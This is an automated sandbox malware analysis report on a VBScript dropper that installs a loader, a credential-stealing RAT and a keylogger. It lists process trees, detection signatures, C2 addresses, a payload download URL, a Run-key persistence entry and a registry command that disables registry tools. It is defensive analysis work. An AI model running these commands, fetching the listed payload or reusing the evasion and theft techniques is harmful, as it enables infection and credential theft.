Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INQUIRY LIST 292.vbs

Overview

General Information

Sample name:INQUIRY LIST 292.vbs
Analysis ID:1592501
MD5:2f5edacbfdae7a51267deeb8e937bfec
SHA1:d0ce895b7a4e55fe7f12121878a5818850f1dc00
SHA256:07898f8cb7e07bd6b86fd09cfff5898eb246a44524b3dda7a39e3de32667490b
Tags:vbsuser-abuse_ch
Infos:

Detection

DBatLoader, MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected DBatLoader
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
PE file contains section with special chars
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: WScript or CScript Dropper
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7160 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • x.exe (PID: 6492 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 4692AEE744A1B1FAB794FF334A77A462)
      • cmd.exe (PID: 3584 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\UhzauuilF.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3140 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • liuuazhU.pif (PID: 1856 cmdline: C:\Users\Public\Libraries\liuuazhU.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
        • reg.exe (PID: 6612 cmdline: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Uhzauuil.PIF (PID: 2104 cmdline: "C:\Users\Public\Libraries\Uhzauuil.PIF" MD5: 4692AEE744A1B1FAB794FF334A77A462)
    • liuuazhU.pif (PID: 5640 cmdline: C:\Users\Public\Libraries\liuuazhU.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
      • reg.exe (PID: 1516 cmdline: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • conhost.exe (PID: 1144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Uhzauuil.PIF (PID: 3796 cmdline: "C:\Users\Public\Libraries\Uhzauuil.PIF" MD5: 4692AEE744A1B1FAB794FF334A77A462)
    • liuuazhU.pif (PID: 5956 cmdline: C:\Users\Public\Libraries\liuuazhU.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
      • reg.exe (PID: 3584 cmdline: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://www.volareconsultoria.com.br/245_Uhzauuilkul"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000001.2046847022.0000000000400000.00000040.00000001.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 FC 88 44 24 2B 88 44 24 2F B0 A9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x22bae:$a1: get_encryptedPassword
      • 0x22b82:$a2: get_encryptedUsername
      • 0x22c46:$a3: get_timePasswordChanged
      • 0x22b5e:$a4: get_passwordField
      • 0x22bc4:$a5: set_encryptedPassword
      • 0x22991:$a7: get_logins
      • 0x21f1b:$a8: GetOutlookPasswords
      • 0x213e0:$a9: StartKeylogger
      • 0x1fe18:$a10: KeyLoggerEventArgs
      • 0x1fde7:$a11: KeyLoggerEventArgsEventHandler
      • 0x22a65:$a13: _encryptedPassword
      0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
        Click to see the 67 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        17.2.liuuazhU.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x1300:$s3: 83 EC 38 53 B0 FC 88 44 24 2B 88 44 24 2F B0 A9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1fdd0:$s5: delete[]
        • 0x1f288:$s6: constructor or from DllMain.
        17.1.liuuazhU.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x1300:$s3: 83 EC 38 53 B0 FC 88 44 24 2B 88 44 24 2F B0 A9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1fdd0:$s5: delete[]
        • 0x1f288:$s6: constructor or from DllMain.
        6.3.liuuazhU.pif.1b37a088.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          6.3.liuuazhU.pif.1b37a088.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            6.3.liuuazhU.pif.1b37a088.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x1fea6:$a1: get_encryptedPassword
            • 0x1fe7a:$a2: get_encryptedUsername
            • 0x1ff3e:$a3: get_timePasswordChanged
            • 0x1fe56:$a4: get_passwordField
            • 0x1febc:$a5: set_encryptedPassword
            • 0x1fc89:$a7: get_logins
            • 0x1f213:$a8: GetOutlookPasswords
            • 0x1e6d8:$a9: StartKeylogger
            • 0x1d110:$a10: KeyLoggerEventArgs
            • 0x1d0df:$a11: KeyLoggerEventArgsEventHandler
            • 0x1fd5d:$a13: _encryptedPassword
            Click to see the 189 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
            Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 6492, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
            Sigma detected: Execution from Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\liuuazhU.pif, CommandLine: C:\Users\Public\Libraries\liuuazhU.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\liuuazhU.pif, NewProcessName: C:\Users\Public\Libraries\liuuazhU.pif, OriginalFileName: C:\Users\Public\Libraries\liuuazhU.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 6492, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\liuuazhU.pif, ProcessId: 1856, ProcessName: liuuazhU.pif
            Sigma detected: New RUN Key Pointing to Suspicious Folder
            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Uhzauuil.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 6492, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Uhzauuil
            Sigma detected: Suspicious Program Location with Network Connections
            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 193.122.6.168, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\liuuazhU.pif, Initiated: true, ProcessId: 1856, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs", CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs", ProcessId: 7160, ProcessName: wscript.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Uhzauuil.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 6492, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Uhzauuil
            Sigma detected: Execution of Suspicious File Type Extension
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\liuuazhU.pif, CommandLine: C:\Users\Public\Libraries\liuuazhU.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\liuuazhU.pif, NewProcessName: C:\Users\Public\Libraries\liuuazhU.pif, OriginalFileName: C:\Users\Public\Libraries\liuuazhU.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 6492, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\liuuazhU.pif, ProcessId: 1856, ProcessName: liuuazhU.pif
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs", CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs", ProcessId: 7160, ProcessName: wscript.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-16T08:29:14.702006+010020283713Unknown Traffic192.168.2.44973150.116.86.44443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-16T08:29:21.836380+010028032742Potentially Bad Traffic192.168.2.449732193.122.6.16880TCP
            2025-01-16T08:29:34.882496+010028032742Potentially Bad Traffic192.168.2.449740193.122.6.16880TCP
            2025-01-16T08:29:41.869304+010028032742Potentially Bad Traffic192.168.2.449742193.122.6.16880TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: INQUIRY LIST 292.vbsAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFAvira: detection malicious, Label: HEUR/AGEN.1325914
            Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: HEUR/AGEN.1325914
            Found malware configuration
            Source: Uhzauuil.PIF.1.drMalware Configuration Extractor: DBatLoader {"Download Url": ["https://www.volareconsultoria.com.br/245_Uhzauuilkul"]}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFReversingLabs: Detection: 42%
            Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 42%
            Source: C:\Windows \SysWOW64\NETUTILS.dllReversingLabs: Detection: 60%
            Multi AV Scanner detection for submitted file
            Source: INQUIRY LIST 292.vbsReversingLabs: Detection: 31%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Windows \SysWOW64\NETUTILS.dllJoe Sandbox ML: detected

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\Public\Libraries\liuuazhU.pifUnpacked PE file: 6.2.liuuazhU.pif.400000.1.unpack
            Source: C:\Users\Public\Libraries\liuuazhU.pifUnpacked PE file: 11.2.liuuazhU.pif.400000.2.unpack
            Source: C:\Users\Public\Libraries\liuuazhU.pifUnpacked PE file: 17.2.liuuazhU.pif.400000.0.unpack
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49741 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49743 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 50.116.86.44:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000001.00000003.1825875616.000000007F62F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdb source: x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1825651514.000000007F650000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.00000000204BF000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.1.dr
            Source: Binary string: _.pdb source: liuuazhU.pif, 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, liuuazhU.pif, 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000001.00000003.1848292254.0000000021462000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000003.1848292254.0000000021491000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1825651514.000000007F650000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.00000000204BF000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.1.dr
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027D5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,1_2_027D5908
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h6_2_1CFCDD90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2018B807h6_2_2018B3E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2018EBACh6_2_2018E810
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2018ABEDh6_2_2018A850
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2018E02Ch6_2_2018DC90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2018A05Dh6_2_20189CC0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2018D4ACh6_2_2018D110
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2018B1B5h6_2_2018AE18
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2018E5ECh6_2_2018E250
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2018A625h6_2_2018A288
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2018DA6Ch6_2_2018D6D0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20189A95h6_2_201896F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2018BFDAh6_2_2018BF30
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2018BFDAh6_2_2018BF2A
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2018CEECh6_2_2018CB50
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h6_2_2019E7C0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2019EF95h6_2_2019EBF0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D1E590h6_2_20D1E388
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D1F084h6_2_20D1E388
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D1633Ch6_2_20D15FA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D1747Ch6_2_20D170E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D1C084h6_2_20D1BCE8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D14C3Ch6_2_20D148A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D17FFCh6_2_20D17C60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_20D1E060
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D1CC04h6_2_20D1C868
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D157BCh6_2_20D15420
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D1A3C4h6_2_20D1A028
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D15D7Ch6_2_20D159E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D1A984h6_2_20D1A5E8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D1913Ch6_2_20D18DA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D168FCh6_2_20D16560
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D1B504h6_2_20D1B168
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_20D1D698
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D17A3Ch6_2_20D176A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D1C644h6_2_20D1C2A8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_20D1DE60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D151FCh6_2_20D14E60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D19E04h6_2_20D19A68
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D185BCh6_2_20D18220
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D1D1C4h6_2_20D1CE28
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D18B7Ch6_2_20D187E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D1AF44h6_2_20D1ABA8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D19707h6_2_20D19360
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D16EBCh6_2_20D16B20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 20D1BAC4h6_2_20D1B728
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov esp, ebp6_2_2101240B
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]6_2_211703C8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]6_2_211703F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]6_2_21170400
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h11_2_2A6BDD90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h11_2_2D94E7C0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2D94EF95h11_2_2D94EBF0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E42B807h11_2_2E42B3E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E42E5ECh11_2_2E42E250
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E42B1B5h11_2_2E42AE18
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E42DA6Ch11_2_2E42D6D0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E429A95h11_2_2E4296F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E42A625h11_2_2E42A288
